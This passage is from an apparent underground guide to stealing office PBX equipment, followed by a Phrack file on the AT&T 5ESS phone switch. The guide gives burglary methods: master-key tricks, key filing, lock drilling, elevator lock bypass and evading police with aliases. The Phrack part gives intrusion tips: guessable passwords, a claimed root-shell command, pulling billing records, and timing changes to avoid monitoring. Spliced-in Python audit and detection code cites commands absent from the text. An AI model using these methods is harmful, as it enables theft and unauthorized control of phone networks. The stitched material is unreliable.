You can more readily take advantage of the skills possessed by locksmiths. Because the offices within a typical building all use the same brand lock with a common keying system, any of the locks can yield the pattern for a master key to the whole system. Obtain a spare lock from the basement, maintenance room, or anywhere extra doors and hardware are stored, and take it to a locksmith. Request a key for that lock and a master. Many of the offices should now be open to you. Some keys are labeled with numbers -- if the sequence on the key equals the number of pins in the lock, you can write down the number and lock brand, and get a duplicate of the key cut.

There is also a little locksmithing you can do on your own.
With a #3 triangular "rat tail" file and a key blank to the brand lock you are targeting, you can make your own key. Blanks are either aluminum or brass and scratch easily -- this is no accident. By inserting a key blank in the lock and moving it from side to side, you'll create slate-colored scratch lines on the blank from the lock's pins. The lines will indicate where to begin filing a valley -- there'll be one for each pin. Move the file back and forth a few times and re-insert the key to make new lines. Use the point of the file only when beginning the valley; successive passes should not create a point at the bottom of the cut but leave a flat gap. When no new scratch appears on the bottom of a particular valley, don't file the valley any deeper -- it's complete. Eventually, all the valleys will be cut and you'll have a key to open the lock. Last but certainly not least, you can drill most locks where a little noise can be afforded. Using a 1/4 inch Milwaukee cordless drill with about a 1/8 inch carbide-tipped bit, you can drill a hole the length of the lock's cylinder. Drill approximately 1/8 inch directly above the keyhole. This destroys the lock's pins in its path, and allows others above to fall down into the hole. Now the cylinder will turn with any small screwdriver placed in the keyhole and open the lock. Little practice is demanded of this technique, and it's a hell of a lot of fun. -- Elevator manipulation. Elevators can be stubborn at times in rejecting your floor requests. Companies that occupy entire floors must prevent an after-hours elevator from opening up on their unattended office. If there's a small lock corresponding or next to that floor's selection button, unscrew the panel and short out the two electrical leads on the other end of the lock. Continue to short the contacts until you press the button and it stays lit -- you'll then arrive at your desired floor. 
The elevator motor and control room is located either on the roof or penthouse level and can be frequently found accessible. Besides being a place to hide, sometimes you can find a bank of switches that override the elevator's control panel (if for some reason you can't open it or it's cardkey-controlled) and get to your floor that way. Two people with radios are needed to do this -- one in the equipment room, one in the elevator. Watch for high voltage and getting your coat caught in a drive belt ... Operation Integrity By taking advantage of daytime access, hiding places, and some of the more sophisticated methods, there's no need to become an alarm connoisseur or full-blown locksmith to liberate PBX equipment. When you can't avoid nighttime activity or an activated alarm system, then be sure to take extra precautions. Have lookouts, two-way radios, even a police scanner. Don't use CB radios, but rather HAM transceivers or anything that operates on proprietary frequencies. This will require a small investment, but there's no price on your safety. Office buildings in downtown areas tend to be more secure than those in the suburbs or outlying areas. Location and surroundings are important considerations when your operation takes place at night. It should also be noted that a building without a security guard (typically the norm) may still subscribe to sporadic security checks where rent-a-cops drive around the building at some regular interval. With regard to transportation and storage, rent vehicles and facilities in alias names where appropriate. Use taxis to pick you up when you're departing with only a briefcase or single box of cards. No matter what the time may be, anyone seeing you enter a taxi in front of the office will assume you're legit. 
It is our sincere wish that you apply this information to the fullest extent in order to free yourself from becoming a mere tool of capitalism, and use this freedom to pursue those things in life that truly interest you. We have tried to summarize and convey enough basic information here to provide you with a complete underground operation possibility. All material in this file is based on actual experience of the authors and their associates.

For information on the sale of PBX or other telecommunications equipment, or for any other inquiry, contact the Dark Side Research group at the following Internet address :

codec@cypher.com

***************************************************************************

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 16 of 27

AT$T 5ESS(tm)
From Top to Bottom

by: Firm G.R.A.S.P.

Introduction
~~~~~~~~~~~~
Welcome to the world of the 5ESS. In this file I will be covering the switch topology, hardware, software, and how to program the switch. I am sure this file will make a few people pissed off over at BellCORE. Anyways, the 5ESS switch is the best (I think) all around switch. Far better than an NT. NT has spent too much time with SONET and their S/DMS TransportNode OC48. Not enough time with ISDN, like AT$T has done. Not only that, but DMS 100s are slow, slow, slow! Though I must hand it to NT, their DMS-1 is far better than AT$T's SLC-96.

What is the 5ESS
~~~~~~~~~~~~~~~~
The 5ESS is a switch. The first No. 5ESS in service was cut over in Seneca, Illinois (815) in early 1982. This test ran into a few problems, but all in all was a success. The 5ESS is a digital switching system; this advantage was realized in No. 4 ESS in 1976.
The 5ESS network is a TST (Time Space Time) topology; the TSIs (Time Slot Interchangers) each have their own processor, which makes the 5ESS one of the faster switches. Though I hear some ATM switches are getting up there.

5ESS System Architecture & Hardware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[Figure: 5ESS SYSTEM ARCHITECTURE. Block diagram with two regions. ADMINISTRATIVE MODULE: Input Output Processor (with OSS Data Links and TTY/CRT), Main Store, 3B Central Control, Disk. COMMUNICATIONS MODULE: TMS and Message Switch. Switch Modules are drawn alongside the Communications Module.]

The 5 ESS is a digital SPC switching system which utilizes distributed control, a TST switching network and modular hardware and software design. The major components are:

ADMINISTRATIVE MODULE

Two 3B20S Processors (which equal a 3B20D)
  - Central control and main storage
  - Disk storage for infrequently used programs and data, and main storage regeneration.
  - The two 3B20S processors are always comparing data, and when one fails the other acts in its place.

Two Input/Output Processors (IOP)
  - Provides TTY and data-link interfaces to the 3B20D Processor, 5ESS Network, Master Control Center (MCC), and various Operational Support Systems (OSS).

Here is a list of the default TTY (also called "channels")

tty       Channel Name

ttyA      Master control console (MCC) terminal.
ttyB      Master control console (MCC) terminal.
ttyC      Traffic report printer
ttyJ      supplementary trunk and line work station (STLWS) terminals
ttyK      supplementary trunk and line work station (STLWS) terminals
ttyL      supplementary trunk and line work station (STLWS) terminals
ttyM      supplementary trunk and line work station (STLWS) terminals
ttyN      supplementary trunk and line work station (STLWS) terminals
ttyO      supplementary trunk and line work station (STLWS) terminals
ttyP      Repair service bureau - Recent change and verify (RSB-RCV)
ttyR      Office records printer
ttyQ      Switching control center-recent change and verify (SCC-RCV) terminals
ttyR      Repair service bureau-automatic line insulation testing (RSB-ALIT) terminal.
ttyS      Switching control center-recent change and verify (SCC-RCV) terminals
ttyT      Switching control center-recent change and verify (SCC-RCV) terminals
ttyU      Belt line B
ttyV      Local recent change and verify (RCV) terminal
ttyW      Remote recent change and verify (RCV) terminal.
ttyY      Network administration center (NAC) terminal.
ttyZ      The switching control center (SCC) terminal.
ttyi      SLC(R) carrier maintenance
ttyj      STLWS - fifth of six
ttyk      STLWS - sixth of six
ttyl      STLWS - first of six
ttym      STLWS - second of six
ttyn      STLWS - third of six
ttyo      STLWS - fourth of six
ttyp      RCV/Repair Service Bureau
ttyq      RCV/Network Administration Center
ttyr      ALIT/Repair Service Bureau
ttys      Maintenance
ttyt      Maintenance
ttyu      Belt line A
ttyv      Local RC/V
ttyw      Remote RC/V
ttyx      Maintenance Control Center/Switching Control Center System (MCC/SCCS)
ttyy      Maintenance Control Center/Switching Control Center System (MCC/SCCS)
ttyz      Maintenance Control Center/Switching Control Center System (MCC/SCCS)
FILE      Destination file name in /rclog partition
mt00      High-density tape device, rewind after I/O
mt04      High-density tape device, does not rewind after I/O
mt08      Low-density tape device, rewind after I/O
mt0c      Low-density tape device, does not rewind after I/O
mt18      Low-density tape device, rewind after I/O
mt1c      Low-density tape device, does not rewind after I/O
mttypc0   Special tape device, IOP 0, rewind after I/O
mttypc1   Special tape device, IOP 1, rewind after I/O.

Two Automatic Message Accounting (AMA) units
  - Uses data links to transport calling information to central revenue accounting office and AMA tape.

Here is the basic AMA structure for the OSPS model.
  - Called customer's telephone number, either a seven- or ten-digit number
  - Calling customer's telephone number, seven digits
  - Date
  - Time of day
  - Duration of conversation.

COMMUNICATIONS MODULE

Message Switch (MSGS)
  - Provides for control message transfer between the 3B20D Processor and Interface Modules (IM's)
  - Contains the clock for synchronizing the network.
Time Multiplexed Switch (TMS)
  - Performs space division switching between SM's
  - Provides permanent time slot paths between each SM and the MSGS for control messages between the Processor and SM's (or between SM's)

Switching Module (SM)
  - Terminates lines and trunks
  - Performs time division switching
  - Contains a microprocessor which performs call processing functions for the SM

[Figure: 5ESS - SWITCH MODULE. Block diagram. The SMPU sits at the top and the DSU at the bottom. Four interface units feed the TSIU (512 Time Slots): LU (64) for Analog Sub Lines, TU (64) for Analog Trunk Lines, DCLU (128) to SLC-96 Remote, DLTU (256) for T1 Lines. The TSIU connects over (256) NCT Links to the TMS.]

COMMON COMPONENTS OF THE SWITCH MODULE (SM)

Switch Module Processor Unit (SMPU)
  - Contains microprocessors which perform many of the call processing functions for trunks and links terminated on the SM.

Time Slot Interchange Unit (TSIU)
  - 512 time slot capacity
  - Connects to the TMS over two 256-time slot Network Control and Timing (NCT) links.
  - Switches time slots from Interface Units to one of the NCT links (for intermodule calls).
  - Switches time slots from one Interface Unit to another within the SM (for intramodule calls).

Digital Service Unit (DSU)
  - Local DSU provides high usage service circuits, such as tone decoders and generators, for lines and trunks terminated on the SM.
  - Global DSU provides low usage service circuits, such as 3-port conference circuits and the Transmission Test Facility, for all lines and trunks in the office (requires 64 time slots).

The SM may be equipped with four types of Interface Units:

Line Unit (LU)
  - For terminating analog lines.
  - Contains a solid-state two-stage analog concentrator that provides access to 64 output channels.
    The concentrator can be fully equipped to provide 8:1 concentration or can be fully equipped to provide 6:1 or 4:1 concentration.
  - Each TU requires 64 time slots.

Trunk Unit (TU)
  - For terminating analog trunks.
  - Each TU requires 64 time slots.

Digital Line Trunk Unit (DLTU)
  - For terminating digital trunks and RSM's.
  - Each fully equipped DLTU requires 256 time slots.
  - A maximum of 10 DS1s may be terminated on one DLTU.

The SM may be equipped with any combination of LU's, TU's, DCLU's and DLTU's totaling 512 time slots.

5ESS System Software
~~~~~~~~~~~~~~~~~~~~
The 5ESS is a UNIX based switch. UNIX has played a large part in switching systems since 1973 when UNIX was used in the Switching Control Center System (SCCS). The first SCCS was a 16 bit microcomputer. The use of UNIX for SCCS allowed development in C code, pseudo code, load test, structure and thought. This led to the development of the other switching systems which AT$T produces today (such as System 75, 85, 1AESS AP, and 5ESS).

NOTE: You may hear SCCS called the "mini" sometimes

The 5ESS's /etc/getty is not set up for the normal login that one would expect to see on a UNIX System. This is due to the different channels that the 5ESS has. Some channels are the TEST Channel, Maintenance Channel, and RC Channel (which will be the point of focus). Once you are on one channel you can not change the channel; as someone has said, "it is not a TV!" You are physically on the channel you are on.

Test Channel
~~~~~~~~~~~~
The TEST channel is where one can test lines, and test the switch itself. This is where operating support systems (such as LMOS) operate from. This channel allows one to monitor lines via the number test trunk (aka adding a third trunk), voltage test and line seizure. Here is a list of OSSs which access the test channels on the 5ESS.
Group                      Operating Support Systems

Special Service Center     SMAS via NO-Test
                           SARTS (IPS)
                           NO-TEST trunk (from the switch)
                           TIRKS
                           17B and 17E test boards (CCSA net using X-Bar)
                           RTS
                           BLV
                           POVT
                           DTAC
                           etc...

Repair Service Bureau      #16LTD
                           #14LTD
                           LMOS (IPS)
                           MLT-2
                           ADTS
                           TIRKS
                           TFTP
                           TRCO
                           DAMT
                           ATICS
                           etc...

SCC Channel
~~~~~~~~~~~
The SCC channel is where the SCC looks and watches the switch 24 hours a day, seven days a week! From this channel one can input RC messages if necessary. A lot of people have scanned these out, and thought they were AMATs. Well this is in short, WRONG! Here is a sample buffering of what they are finding.

-----------------------------------------------------------------------------
S570-67 92-12-21 16:16:48 086901 MDIIMON BOZOVILL DS0
A REPT MDII WSN SIGTYPE DP TKGMN 779-16 SZ 21 OOS 0
SUPRVSN RB TIME 22:16:48 TEN=14-0-1-3-1 TRIAL 1 CARRFLAG NC
ID OGT NORMAL CALL CALLED-NO CALLING-NO DISCARD 0

S4C0-148963487 92-12-21 16:17:03 086902 MAIPR BOZOVILL DS0
OP:CFGSTAT,SM=1&&192,OOS,NOPRINT; PF

S570-67 92-12-21 16:17:13 086903 S0 BOZOVILL DS0
M OP CFGSTAT SM 5 FIRST RECORD
UNIT               MTCE STATE    ACTIVITY  HDWCHK  DGN RESULT
LUCHAN=5-0-0-3-4   OOS,AUTO,FE   BUSY      INH     CATP
LUCHAN=5-0-0-2-5   OOS,AUTO,FE   BUSY      INH     ATP
LUCHAN=5-0-0-0-3   OOS,AUTO,FE   BUSY      INH     ATP
LUCHAN=5-0-0-3-5   OOS,AUTO,FE   BUSY      INH     ATP
LUHLSC=5-0-0-1     OOS,AUTO,FE   BUSY      INH     ATP
LUCHAN=5-0-0-0-2   OOS,AUTO,FE   BUSY      INH     CATP
LUCHAN=5-0-0-3-6   OOS,AUTO,FE   BUSY      INH     ATP
LUCHAN=5-0-0-1-4   OOS,AUTO,FE   BUSY      INH     ATP

S570-983110 92-12-21 17:09:53 144471 TRCE WCDS0
A TRC IPCT EVENT 2991
DN 6102330000 DIALED DN 6102220001
TIME 17:09:52
------------------------------------------------------------------------------

This has nothing to do with AMA; this is switch output on, say, the SCC channel. This is used by the SCCS for logging, and monitoring of alarms. The whole point of this channel is to make sure the switch is doing what it should do, and to log all activity on the switch. NOTHING MORE!
To go into these messages and say what they are would take far too long; order the OM manuals for the 5ESS, but watch out: they are about 5 times the size of the IM (input manual) set. On average it takes someone three years of training to be able to understand all this stuff; there is no way anyone can write a little file in Phrack and hope all who read it understand everything about the 5ESS. RTFM!

RC Channel
~~~~~~~~~~
The RC/V (Recent Change/Verify) Channel is where new features can be added or taken away from phone lines. This is the main channel you may come in contact with, if you come in contact with any at all. When one connects to a 5ESS RC/V channel one may be dumped to a CRAFT shell if the login has not been activated. Access to the switch when the login is active is controlled by lognames and passwords to restrict unwanted entry to the system. In addition, the SCC (Switching Control Center) sets permission modes in the 5ESS switch which control the RC (recent change) security function.

The RC security function determines whether recent changes may be made and what types of changes are allowed. If a situation arises where the RC security function denies the user access to recent change via RMAS or RC channels, the SCC must be contacted so that the permission modes can be modified. (Hint Hint)

The RC security function enables the operating telephone company to decide which of its terminals are to be allowed access to which set of RC abilities. NOTE that all verify input messages are always allowed and cannot be restricted, which does not help too much.

The RC security data is not part of the ODD (office dependent data).
Instead, the RC security data is stored in relatively safe DMERT operating
system files which are only modifiable using the following message:

        SET:RCACCESS,TTY="aaaaa",ACCESS=H'bbbbb;

where:  aaaaa = Symbolic name of terminal in double quotes
        H'    = Hexadecimal number indicator in MML
        bbbbb = 5-character hexadecimal field in 5E4 constructed from
                binary bits corresponding to RC ability.  The field range
                in hexadecimal is from 00000 to FFFFF.

This message must be entered for each type terminal (i.e. "aaaaa"="rmas1",
"rmas2", etc., as noted above in TTY explanations).

NOTE: Order IM-5D000-01 (5ESS input manual) or OM-5D000-01 (5ESS output
      manual) for more information on this and other messages from the CIC
      at 1-800-432-6600.  You have the money, they have the manuals, do not
      ask, just order.  I think they take AMEX!

When the message is typed in, a DMERT operating system file is created for a
particular terminal.  The content of these files, one for each terminal, is
a binary field with each bit position representing a unique set of RC
abilities.  Conversion of this hexadecimal field to binary is accomplished
by converting each hexadecimal character to its equivalent 4-bit binary
string.

----------------------------------------------------------
HEX  BINARY  |  HEX  BINARY  |  HEX  BINARY  |  HEX  BINARY
-------------|---------------|---------------|------------
 0    0000   |   4    0100   |   8    1000   |   C    1100
-------------|---------------|---------------|------------
 1    0001   |   5    0101   |   9    1001   |   D    1101
-------------|---------------|---------------|------------
 2    0010   |   6    0110   |   A    1010   |   E    1110
-------------|---------------|---------------|------------
 3    0011   |   7    0111   |   B    1011   |   F    1111
----------------------------------------------------------

Each bit position corresponds to a recent change functional area.  A
hexadecimal value of FFFFF indicates that all bit positions are set to 1
indicating that a particular terminal has total RC access.
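
The hex-to-binary conversion above, applied as a least-privilege audit of SET:RCACCESS settings. This is an added example, not from the original file or from AT&T documentation; the terminal names, the sample messages and the approved baseline masks are constructed, and since the file does not say which bit maps to which RC functional area, the bits are left unnamed.

```python
import re

# Message shape as given in the text:
#   SET:RCACCESS,TTY="aaaaa",ACCESS=H'bbbbb;
SET_RCACCESS = re.compile(
    r"""^SET:RCACCESS,TTY="(?P<tty>[^"]+)",ACCESS=H'(?P<mask>[0-9A-Fa-f]+);$"""
)

FIELD_BITS = 20                       # five hex characters, 4 bits each
FULL_ACCESS = (1 << FIELD_BITS) - 1   # H'FFFFF, "total RC access"


def parse_set_rcaccess(message):
    """Return (terminal name, integer mask) or raise ValueError."""
    m = SET_RCACCESS.match(message.strip())
    if not m:
        raise ValueError("not a well-formed SET:RCACCESS message")
    mask = m.group("mask")
    if len(mask) != 5:
        raise ValueError("ACCESS field must be exactly 5 hex characters")
    return m.group("tty"), int(mask, 16)


def to_binary(value):
    """Expand the mask one hex character at a time, as in the table above."""
    bits = format(value, "020b")
    return " ".join(bits[i:i + 4] for i in range(0, FIELD_BITS, 4))


def audit(messages, approved):
    """Compare each terminal's mask with its approved baseline mask.

    `approved` maps terminal name -> mask the operator intends it to have.
    A terminal missing from the baseline is treated as approved for nothing.
    """
    findings = []
    for msg in messages:
        try:
            tty, value = parse_set_rcaccess(msg)
        except ValueError as exc:
            findings.append({"message": msg, "error": str(exc)})
            continue
        excess = value & ~approved.get(tty, 0) & FULL_ACCESS
        findings.append({
            "tty": tty,
            "binary": to_binary(value),
            "bits_set": bin(value).count("1"),
            "total_access": value == FULL_ACCESS,
            "excess": format(excess, "05X"),   # bits granted beyond baseline
        })
    return findings


# Constructed sample input: three settings and a hypothetical baseline.
SAMPLE_MESSAGES = [
    'SET:RCACCESS,TTY="rmas1",ACCESS=H\'FFFFF;',
    'SET:RCACCESS,TTY="rmas2",ACCESS=H\'0A3C1;',
    'SET:RCACCESS,TTY="rmas3",ACCESS=H\'FFF;',      # too short, rejected
]
APPROVED = {"rmas1": 0x0A3C1, "rmas2": 0x0A001}

if __name__ == "__main__":
    for finding in audit(SAMPLE_MESSAGES, APPROVED):
        print(finding)
```

Any terminal whose `excess` is not 00000, or whose `total_access` is true, holds RC abilities beyond what the baseline allows.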
Also, verify operations as well as lettered classes are not included in the
terminal's security scheme since all terminals have access to verify views
and lettered classes.

In addition, maintenance personnel are able to verify the security code for
any terminal by typing the following message from either the MCC (Master
Control Center) or SCCS (Switching Control Center System) Mini terminal:

        OP:RCACCESS,TTY="xxxxx";

where:  xxxxx = symbolic name of terminal in double quotes.

Each bit position corresponds to a recent change functional area.  To ensure
redundancy, DMERT operating system files are backed up immediately on disk
by the SCC.

The input message that defines the password and CLERK-ID (another name for
username) is in the Global RC feature.  This input message defines a
clerk-id and associated password or deletes an existing one.  (Recall that
CLERK-ID and PASSWORD are required fields on the Global RC Schedule view
28.1 in RCV:MENU:APPRC, but more on this later.)  This new input message is
as follows:

        GRC:PASSWORD,CLERKID=xxxxxxxxxx,[PASSWD=xxxxxxxx|DELETE]

Note: CLERKID can be from 1 to 10 alphanumeric characters and PASSWORD from
      1 to 8 alphanumeric characters.  This input message can only be
      executed from the MCC or SCCS terminals, and only one password is
      allowed per CLERK-ID.  To change a clerk-id's password, this message
      is used with the same CLERK-ID but with a different password.

Global RC Schedule View 28.1 from the RC/V Recent Change Menu System

----------------------------------------------------------------------------
                            5ESS SWITCH WCDS0
                            RECENT CHANGE 28.1
                     GLOBAL RECENT CHANGE SCHEDULING

 *1. GRC NAME    __________
 *2. SECTION     _____
 #3. CLERK ID    __________
 #4. PASSWORD    ________
  5. MODE        _______
  6. RDATE       ______
  7. RTIME       ____
  8. SPLIT       _
  9. SPLIT SIZE  _____
 10. MAX ERRORS  _____
 11. VERBOSE     _
----------------------------------------------------------------------------

When the security is set up on the RC/V channel, one will see:

----------------------------------------------------------------------------
5ESS login
15 WCDS0 5E6(1) ttsn-cdN TTYW
Account name:
----------------------------------------------------------------------------

There are no defaults, since the CLERK-ID and the password are set by craft,
but common passwords would be the name of the town, CLLI, MANAGER, SYSTEM,
5ESS, SCCS1, SCC, RCMAC, RCMAxx, etc,...

If one sees just a " < " prompt you are at the 'craft' shell of the RC/V
channel; the 5E login has not been set.  The Craft shell is running on the
DMERT (which is a UNIX environment development operating system, a System V
hack).  The Craft shell prompt is a "<".  From this shell one will see
several error messages.  Here is a list and what they mean:

Error Message   Meaning

    ?A          Action field contains an error
    ?D          Data field contains an error
    ?E          Error exists in the message but can not be resolved to the
                proper field (this is the "you have no idea" message)
    ?I          Identification field contains an error
    ?T          Time-out has occurred on channel
    ?W          Warning exists in input line

Other output message meanings, from the RC/V craft menu.

    OK          Good
    PF          Printout follows
    RL          Retry later
    NG          No good, typically hardware failure (ie: SM does not exist)
    IP          In progress
    NA          The message was not received by the backup control process

When inputting RC messages it is best to do it in the middle of the day
since RC messages are sent to each channel!  The SCC is watching and if
there are RC messages running across at 3 in the morning, the SCC is going
to wonder what the hell RCMAC (Recent Change Memory Administration Center)
is doing at three in the morning!  However, one may be hidden by MARCH's
soaking, and the night shift at the SCC are overloaded and may miss what is
going on while correcting other major problems.  So it is up to you.
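
The monitoring the SCC is described as doing above, sketched as detection logic over SCC-channel output. This is an added example, not part of the original file: the record header layout is inferred from the sample buffer shown earlier, the log text is constructed, the watchlist holds only input messages named in this file, and the 07:00-18:00 day shift is an assumption.

```python
import re
from datetime import datetime

# Header shape inferred from the sample buffer in this file, e.g.
#   S4C0-148963487 92-12-21 16:17:03 086902 MAIPR BOZOVILL DS0
# Field names are assumptions; the trailing token is optional.
HEADER = re.compile(
    r"^(?P<src>\S+) (?P<date>\d\d-\d\d-\d\d) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<seq>\d{6}) (?P<cls>\S+) (?P<office>\S+)(?: \S+)?$"
)
INPUT_MSG = re.compile(r"^[A-Z]+:[A-Z0-9]+")   # echoed input, e.g. OP:CFGSTAT

# Input messages this file names that change access, billing or test state.
WATCHLIST = (
    "SET:RCACCESS", "GRC:PASSWORD", "RCV:MENU:SH", "INH:CAMAONI",
    "ALW:CALLMON", "SET:WSPHONE", "SET:WSPOS", "CONN:WSLINE", "EXC:RCRLS",
)
DAY_START, DAY_END = 7, 18   # assumed hours when RCMAC normally works


def parse_records(text):
    """Split channel output into records: one header plus its body lines."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HEADER.match(line)
        if m:
            when = datetime.strptime(
                m.group("date") + " " + m.group("time"), "%y-%m-%d %H:%M:%S")
            current = {"when": when, "seq": m.group("seq"),
                       "office": m.group("office"), "body": []}
            records.append(current)
        elif current is not None:
            current["body"].append(line)
    return records


def find_alerts(records):
    """Return (sequence number, input message, reasons) for suspect records."""
    alerts = []
    for rec in records:
        if not rec["body"]:
            continue
        message = rec["body"][0].split()[0]
        upper = message.upper()
        if not INPUT_MSG.match(upper):
            continue                      # a report, not an echoed input
        sensitive = upper.startswith(WATCHLIST)
        recent_change = upper.startswith("RCV:")
        off_hours = not (DAY_START <= rec["when"].hour < DAY_END)
        reasons = []
        if sensitive:
            reasons.append("sensitive input message")
        if off_hours and (sensitive or recent_change):
            reasons.append("off-hours recent change activity")
        if reasons:
            alerts.append((rec["seq"], message, reasons))
    return alerts


# Constructed sample output in the shape of the buffer shown in this file.
SAMPLE_LOG = """
S570-67 92-12-21 16:16:48 086901 MDIIMON BOZOVILL DS0
A REPT MDII WSN SIGTYPE DP TKGMN 779-16 SZ 21 OOS 0
S4C0-148963487 92-12-21 16:17:03 086902 MAIPR BOZOVILL DS0
OP:CFGSTAT,SM=1&&192,OOS,NOPRINT; PF
S4C0-148963487 92-12-22 03:04:10 086950 MAIPR BOZOVILL DS0
RCV:APPTEXT:DATA,FORM=1V6-VFY,TN=5551212,VFY,END! PF
S4C0-148963487 92-12-22 03:05:41 086951 MAIPR BOZOVILL DS0
INH:CAMAONI; OK
S4C0-148963487 92-12-22 10:30:00 087020 MAIPR BOZOVILL DS0
SET:RCACCESS,TTY="rmas1",ACCESS=H'FFFFF; OK
"""

if __name__ == "__main__":
    for alert in find_alerts(parse_records(SAMPLE_LOG)):
        print(alert)
```

A daytime-only rule would miss the 10:30 access change, which is why the watchlist is checked independently of the clock.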

DMERT
~~~~~
The DMERT (Duplex Multiple Environment Real Time) uses the Western Electric
(another name for AT$T!) 3B20D Duplex processor (or 2 3B20S Simplex
processors).  The DMERT software totals nearly nine thousand source files,
one million lines of non-blank source code, and was developed by
approximately 200 programmers.  There are eight main releases of this
software; they are referred to as generics (like 5E4.1, 5E4.2, to 5E8.1,
also seen as 5E4(1), 5E4(2) to 5E8(1); this can be thought of as a DOS
version).  DMERT is similar to regular UNIX but can be best described as a
custom UNIX system based on the 3B20D; the DMERT OS can be ported to
PDP-11/70s or a large IBM Mainframe.  The DMERT operating system is split
both logically and physically.  Physically, the software is evenly divided
across the five (there were seven Software Development systems all running a
3B20S where the DMERT code was written) Software Development systems.
Logically, the software is divided into twenty-four different subsystems.
To access this from the "craft" shell of the RC/V channel, type:

        RCV:MENU:SH!

NOTE: This will dump one to a root shell, from which VaxBuster's (Who knows
      nothing about VAXen, always wondered about him) file on how to
      redirect a TTY may come in useful.

Programming the 5ESS
~~~~~~~~~~~~~~~~~~~~
When programming the 5ESS there are things one should know; the first is
that one has a lot of power (just keep 911 in mind, it would be foolish to
even think of disrupting anyone's service.  911 is there for a reason, it
should STAY that way).  And anything one does is logged, and can be watched
from the SCC.  Note that the night SCC crew is a lot more lax on how things
are done than the day shift, so it would be best to do this at night.  I
could tell you how to crash the switch in two seconds, but that is not the
point here.  Destroying something is easy, anyone can do that, there is no
point to it.
All that taking down a switch will do is get one into jail, and get sued if
someone needed 911 etc,... (I think SRI is wishing they had talked to me
now).

RC from Craft Shell on RC/V Channel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RC and VFY is complex from the craft shell on the RC/V channel.  This is
called the input text option.  It is accessed by using the RCV:APPTEXT:
message.  This gets a little complex to follow, but the best thing to do is
to order the Manual 235-118-215 Recent Change Procedures Text Interface
[5E4], it is $346.87; another good one to get is 235-118-242, for $413 even;
and last, but the best, is 235-118-243, this beast is only $1344.63, what a
deal.  When calling the CIC they will transfer you to a rep. from your area.
Gets to be kind of a pain in the ass, but..

Anyways, back on track:

RCV:APPTEXT:DATA[,SUMMARY|,NSUMMARY][,VFYIMMED|,VFYEND][,VFYNMVAL|,VFYSCIMG]
[,DEVICE={STDOUT|ROP|ROP0|FILE|TTYx}],FORM=...,DATA,FORM=...,END;

DATA     - This is for more than one RC operation in the same command
FORM     - The format that is to be used
SUMMARY  - Turns on one line summaries on the read only printer (ROP)
           (DEFAULT)
NSUMMARY - Turns off one line summary logging by the ROP
VFYIMMED - Prints out verifies (VFYs) immediately, does not wait for
           session end.
VFYEND   - Prints out all VFYs at session end, this is the DEFAULT.
VFYNMVAL - Print verify output in name-value pair format, this must be
           directed into a file (see DEVICE).
VFYSCIMG - Makes output into screen size image (DEFAULT).
DEVICE   - Redirect verify output to a device other than one's screen.
ROP/ROP0 - Send verify output to the ROP
STDOUT   - Send verify output to one's screen (DEFAULT)
TTYx     - Send verify output to any valid tty (such as ttya and ttyv) that
           exists in "/dev."  You must use the tty name, not tty number.
FILE     - Send verify output to a file in "/rclog".  The file will be
           prefixed with "RCTX", and the user will be given the name of the
           file at the beginning and end of the APPTEXT session.
END      - END of message.

If the parameter is not entered on the command line, it may be entered after
the APPTEXT process begins, but must be entered prior to the first "FORM="
statement.

Here is an example of an MML RCV:APPTEXT.

rcv:apptext:data,form=2v1&vfy,set="oe.entype"&lset="oe.len"&xxxxxxxx,pty=i,vfy!

The 2V1 may look strange at first; it may help getting used to the basics
first.  To just VFY telephone numbers, just do a:

        RCV:APPTEXT:DATA,FORM=1V6-VFY,TN=5551212,VFY,END!

Though I can not really explain this any more than I have just due to time
and space.  These input messages may look complex at first, but are really
simple, and much better than dealing with the menu system, but you will need
to learn RC yourself!  No one can explain it to you.

Pulling AMA from the RC/V channel Craft Shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Pulling AMA up is done with one command.  The command is:

        OP:AMA:SESSION[,ST1|,ST2];

This command will request a report of the current or most recent automatic
message accounting (AMA) tape.  ST1 and ST2 are the data streams.

Pulling up out of Service Lines, Trunks or Trunk Groups
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
One may want to pull up all the out of service lines, trunks, or trunk
groups for many reasons.  These reasons I will not go into, but from which
lines can be set up.  The command to do this from the craft shell is a PDS
command; this command is with a 'ball bat' (a `` ! '').

        OP:LIST,LINES[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
        OP:LIST,TRUNKS[,FULL][,PRINT][;[a][,b][,c][,d][,e]]!
        OP:LIST,TG [,FULL][,PRINT][;[a][,b][,c][,d][,e]]!

FULL  - All (primary and pending) are printed.  Note FULL is not the default
        when inputting this command.
PRINT - Print to the ROP in the CO.  (Not a good idea)
a-e   - This is port status to match against the subset of trunks, lines or
        trunk groups that are specified.
        (This is required input for FULL)

The 5ESS RC/V Menu Shell
~~~~~~~~~~~~~~~~~~~~~~~~
To access this shell from the RC/V channel craft shell, type:

        RCV:MENU:APPRC

at the `` < '' prompt.

To access the 5ESS RC/V menu system from the MCC, STLWS, and TLWS
channel/terminals, one uses what are called pokes.  The poke that is used
here to access the RC/V Menu system on the 5ESS is 196.  Type 196 at the
`` CMD< '' prompt, and you are on the RC/V menu system of the 5ESS switch.
This will cause ``RC/V 196 STARTING'' and ``RC/V 196 COMPLETED'' to be
printed out on the ROP.

Either way, this will toss you into a menu system.  The main menu looks like
this:

------------------------------------------------------------------------------
                            5ESS SWITCH WCDS0
                     RECENT CHANGE AND VERIFY CLASSES

 H  RCV HELP                9  DIGIT ANALYSIS           20  SM PACK & SUBPACK
 A  ADMINISTRATION         10  ROUTING & CHARGING       21  OSPS FEATURE DEFINITION
 B  BATCH INPUT PARMS      11  CUTOVER STATUS           22  ISDN -- EQUIPMENT
 1  LINES                  12  BRCS FEATURE DEFINITION  23  ISDN
 2  LINES -- OE            13  TRAFFIC MEASUREMENTS     24  APPLICATIONS PROCESSOR
 3  LINES -- MLHG          14  LINE & TRUNK TEST        25  LARGE DATA MOVEMENT
 4  LINES -- MISC.         15  COMMON NTWK INTERFACE    26  OSPS TOLL & ASSIST/ISP
 5  TRUNKS                 17  CM MODULE                27  OSPS TOLL & ASSIST
